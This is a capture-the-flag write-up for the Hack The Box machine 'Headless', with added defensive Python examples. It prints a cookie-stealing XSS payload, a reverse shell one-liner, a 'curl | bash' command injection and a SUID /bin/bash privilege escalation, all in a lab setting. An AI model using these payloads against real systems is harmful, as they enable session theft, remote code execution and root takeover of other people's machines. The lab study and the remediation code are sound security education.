# Headless

{% embed url="https://app.hackthebox.com/machines/Headless" %}

## Recon

Let's start with a simple nmap scan.

{% code overflow="wrap" %}

```
┌──(kali㉿kali)-[~]
└─$ nmap -p- -T4 headless.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 06:22 BST
Nmap scan report for headless.htb (10.10.11.8)
Host is up (0.040s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 21.58 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 22,5000 -T4 headless.htb          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 06:24 BST
Stats: 0:00:32 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 06:25 (0:00:32 remaining)
Stats: 0:00:32 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 06:25 (0:00:32 remaining)
Nmap scan report for headless.htb (10.10.11.8)
Host is up (0.040s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
|_  256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)
5000/tcp open  upnp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.2.2 Python/3.11.2
|     Date: Mon, 08 Apr 2024 05:21:06 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2799
|     Set-Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Under Construction</title>
|     <style>
|     body {
|     font-family: 'Arial', sans-serif;
|     background-color: #f7f7f7;
|     margin: 0;
|     padding: 0;
|     display: flex;
|     justify-content: center;
|     align-items: center;
|     height: 100vh;
|     .container {
|     text-align: center;
|     background-color: #fff;
|     border-radius: 10px;
|     box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.2);
|   RTSPRequest: 
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5000-TCP:V=7.94SVN%I=7%D=4/8%Time=66137F9B%P=x86_64-pc-linux-gnu%r(
...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.50 seconds

```

{% endcode %}

We have two open ports, 22 and 5000. Port 5000 looks like a web server (the fingerprint shows Werkzeug/Python), so let's visit it.

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FWOUB044b6jFlariSENnx%2Fimage.png?alt=media&#x26;token=00a626fe-adef-41e9-9f4e-492705f61536" alt=""><figcaption></figcaption></figure>

We have a web page. Let's do some enumeration on it now.

Feroxbuster revealed two directories: `/dashboard` and `/support`.

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FtaNLgSy0yq90GOiMZXUW%2Fimage.png?alt=media&#x26;token=2bfec0c3-9cc4-48c1-a9a6-e85674278558" alt=""><figcaption></figcaption></figure>

## Initial Access

We cannot access `/dashboard`; however, `/support` reveals a web form. Let's try some payloads here.

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FH00jPlAWU928Ak6PijpE%2Fimage.png?alt=media&#x26;token=c4335f15-1064-412a-8bab-94fd8cdf21e4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FndTSIPlfcfTz818eXbjd%2Fimage.png?alt=media&#x26;token=736a0583-f000-4a36-aec2-de892226dd5c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FhWTS6icby8uHMdBCn7vn%2Fimage.png?alt=media&#x26;token=f2729be6-0e4a-4f17-b8fa-c613544de424" alt=""><figcaption></figcaption></figure>

Interesting: we now know that the payload is being detected. Let's repeat the attempt with Burp Suite and a Python HTTP server listening on our machine to check whether the payload actually triggers a fetch.

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FnLWbwLXMcoQu21GnEpQg%2Fimage.png?alt=media&#x26;token=80f5d579-647c-45ed-b6f9-ba39629de205" alt=""><figcaption></figcaption></figure>

After some trial and error, placing the payload in the User-Agent header worked.

{% hint style="info" %}
`<img src=x onerror=fetch('http://<Your Machine IP>/?c='+document.cookie);>`
{% endhint %}

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FzX22vjU2M4BAyTjUwxVs%2Fimage.png?alt=media&#x26;token=ff545929-be23-4364-9068-d9a0a188eda1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2Fw2QgfyMwJWAKhINlqd8K%2Fimage.png?alt=media&#x26;token=ed9a97d6-2e48-40ab-af7c-363e8603d570" alt=""><figcaption></figcaption></figure>

It worked and we now have an admin cookie. We should be able to use it to access the `/dashboard` page.
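As an added illustration (not code from the box or from this writeup), the Python below decodes the readable part of the `is_admin` cookie seen in the nmap output and shows the two server-side fixes that would have stopped this path: output encoding of the reflected User-Agent and an `HttpOnly` cookie. The `payload.signature` shape is assumed to be a Flask/itsdangerous signed value, and the `render_report_*` and `set_cookie_header` functions and the `attacker.example` host are assumptions, not the application's real code.

```python
import base64
import html

# Constructed User-Agent value of the same shape as the payload used above.
XSS_UA = "<img src=x onerror=fetch('http://attacker.example/?c='+document.cookie);>"
SEEN_COOKIE = "InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs"   # value from the nmap output


def decode_cookie_payload(cookie: str) -> str:
    """Return the readable payload of a 'payload.signature' cookie.

    Assumed itsdangerous-style token: the first part is urlsafe base64 of the
    serialised value (here a JSON string), the second an HMAC over it. Anyone
    can read the payload; only the secret-key holder can produce a valid
    signature, which is why the cookie had to be stolen rather than forged.
    """
    payload = cookie.split(".", 1)[0]
    payload += "=" * (-len(payload) % 4)          # restore stripped base64 padding
    return base64.urlsafe_b64decode(payload).decode()


def render_report_vulnerable(user_agent: str) -> str:
    # The header is interpolated into HTML verbatim, so a tag inside the
    # User-Agent runs in the admin's browser when the report is opened.
    return f"<tr><td>User-Agent</td><td>{user_agent}</td></tr>"


def render_report_safe(user_agent: str) -> str:
    # Output encoding for the HTML text context: <, >, &, ' and " become
    # entities, so the browser shows the payload as text instead of running it.
    return f"<tr><td>User-Agent</td><td>{html.escape(user_agent, quote=True)}</td></tr>"


def set_cookie_header(name: str, value: str) -> str:
    # HttpOnly keeps the cookie out of document.cookie, so even a successful
    # XSS cannot read it; SameSite=Lax stops most cross-site sending.
    return f"{name}={value}; Path=/; HttpOnly; SameSite=Lax"
```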

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FoO23C6i0BMrhcDWvl32j%2Fimage.png?alt=media&#x26;token=6db13a61-c480-4eb7-9d63-9c30ff6743d2" alt=""><figcaption></figcaption></figure>

The dashboard generates a report for a specified date. Since it takes user input, let's see if we can get a reverse shell this way. If we intercept the request and inject a payload that opens a connection directly to our machine, we don't get a working callback.

```
bash -i >& /dev/tcp/Your_IP/PortNo 0>&1
```

What happens if we instead curl a script from our machine and pipe it into bash?

Let's put the above payload into a file called `shell.sh`.

We start a Python HTTP server to serve the file and a netcat listener to catch the shell.

Then we append the payload below to the `date` parameter in Burp Suite.

```
;curl http://<YourIP>/shell.sh|bash
```
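The injection works because the `date` value is dropped into a shell command line. As an added example (not the dashboard's actual code, which is not on the page), here is the vulnerable pattern beside a hardened version that validates the date and runs the report without a shell; `report.sh`, the helper names and the `attacker.example` host are assumptions.

```python
import datetime
import subprocess

# Constructed inputs: a normal report date and an injected value of the
# shape used above.
CLEAN_DATE = "2023-09-15"
INJECTED_DATE = "2023-09-15;curl http://attacker.example/shell.sh|bash"


def build_report_command_vulnerable(date: str) -> str:
    # The user-controlled value is concatenated into a shell string, so a ';'
    # or '|' inside it starts a second command when this runs via /bin/sh.
    return f"bash report.sh {date}"


def parse_report_date(date: str) -> datetime.date:
    """Accept only a complete YYYY-MM-DD value; strptime rejects trailing data."""
    return datetime.datetime.strptime(date, "%Y-%m-%d").date()


def is_valid_report_date(date: str) -> bool:
    try:
        parse_report_date(date)
        return True
    except ValueError:
        return False


def build_report_command_safe(date: str) -> list:
    # Validate, normalise, then pass the value as a single argv element.
    # With shell=False there is no shell left to interpret metacharacters.
    clean = parse_report_date(date).isoformat()
    return ["bash", "report.sh", clean]


def run_report(date: str) -> subprocess.CompletedProcess:
    # Assumed report.sh; the argv-list form is the point, not the script itself.
    return subprocess.run(build_report_command_safe(date), shell=False,
                          capture_output=True, text=True, timeout=30, check=False)
```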

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FeVayW5vud6reBmb7DJsC%2Fimage.png?alt=media&#x26;token=2f4f07f1-f392-4cc9-9e65-cf908f9c9177" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2F83kDyOojFd1rhL9LSUlS%2Fimage.png?alt=media&#x26;token=47d2bac4-d469-4bcd-9b21-4bbd976d1b39" alt=""><figcaption></figcaption></figure>

We have our reverse shell and can grab the user flag.

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FNdyaymfKMMPKdU2K6Sl4%2Fimage.png?alt=media&#x26;token=6e76550a-5810-4cd1-baca-dd32b6369407" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

Let's see what we can run with sudo.

```
bash-5.2$ sudo -l
sudo -l
Matching Defaults entries for dvir on headless:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User dvir may run the following commands on headless:
    (ALL) NOPASSWD: /usr/bin/syscheck
bash-5.2$ 
```

We can see that the user dvir may run **/usr/bin/syscheck** as root without a password. Let's look at its contents with cat.

We will find that it runs a bash script (**initdb.sh**) without specifying its full path, so the name resolves relative to the caller's current directory. We can exploit this by creating our own script with the same name in our current directory:

```
echo "chmod u+s /bin/bash" > initdb.sh
chmod +x initdb.sh
```

When we run the syscheck binary from this directory, our script is executed instead, as root. It sets the **SUID bit** on /bin/bash. Let's see this in action by running the following command:

```
sudo /usr/bin/syscheck
```

After running the above command, we start /bin/bash with `-p` so that it keeps the effective privileges of its owner (root) instead of dropping them:

```
/bin/bash -p
```

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2Fi7fcyqFv2wud2bJkKTb0%2Fimage.png?alt=media&#x26;token=429cc12c-1c98-4448-a09f-26200a252e1e" alt=""><figcaption></figcaption></figure>

We are now root and can grab the root flag.
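As an added defender-side example (not part of the writeup), the Python below audits a privileged shell script for exactly this mistake: commands invoked by a relative path, which resolve against the caller's working directory, and bare names, which depend on PATH. `SAMPLE_SCRIPT` is a constructed stand-in, not the real `/usr/bin/syscheck`.

```python
import re
import shlex

# Shell keywords that may precede the real command word in a simple command.
COMMAND_PREFIXES = {"if", "then", "else", "elif", "while", "until", "do", "!", "time"}
# Keywords and builtins that are not executables looked up on disk.
SHELL_BUILTINS = {"fi", "done", "esac", "case", "for", "in", "echo", "exit", "return",
                  "export", "local", "cd", "test", "[", "[[", "set", "unset", "shift",
                  "read", "printf", "true", "false"}

# Constructed sample of a root-run maintenance script. It is NOT the real
# /usr/bin/syscheck, only a stand-in that shows the same class of mistake.
SAMPLE_SCRIPT = """#!/bin/bash
# maintenance checks
if [ "$EUID" -ne 0 ]; then echo "Must run as root"; exit 1; fi
disk=$(/usr/bin/df -h / | /usr/bin/tail -1)
if ! pgrep -x initdb.sh >/dev/null; then
    ./initdb.sh 2>/dev/null
fi
"""


def find_relative_commands(script: str) -> list:
    """Return (line, command, kind) for each command not given as an absolute path.
    kind 'cwd': the name contains a slash, so it resolves against the caller's
    working directory (the hijack used above). kind 'path': a bare name resolved
    through PATH, safe only if PATH is pinned or sudo's secure_path applies."""
    hits = []
    for lineno, line in enumerate(script.splitlines(), 1):
        if lineno == 1 and line.startswith("#!"):
            continue
        # Break the line into simple commands at ||, &&, |, ;, $( and (.
        for segment in re.split(r"\|\||&&|\||;|\$\(|\(", line):
            try:
                words = shlex.split(segment, comments=True)
            except ValueError:
                continue  # unbalanced quotes in a fragment: skip it
            # Drop leading keywords and VAR=value assignments to reach the command.
            while words and (words[0] in COMMAND_PREFIXES
                             or re.match(r"^[A-Za-z_]\w*=", words[0])):
                words.pop(0)
            if not words or words[0] in SHELL_BUILTINS or words[0].startswith("/"):
                continue
            cmd = words[0].rstrip(")")
            if not cmd:
                continue
            hits.append((lineno, cmd, "cwd" if "/" in cmd else "path"))
    return hits


def pins_path(script: str) -> bool:
    """True if the script sets PATH itself instead of trusting the caller's."""
    return re.search(r"^\s*(export\s+)?PATH=", script, re.M) is not None
```

The fix for the sample is the same as for the real binary's script: call `/usr/bin/initdb.sh` (or another absolute path) and set PATH at the top of any script that sudo lets users run.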

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FsJLJvDt9kHJbNUPA8PDT%2Fimage.png?alt=media&#x26;token=3059d7e6-b623-447f-ac9d-4812354a671a" alt=""><figcaption></figcaption></figure>
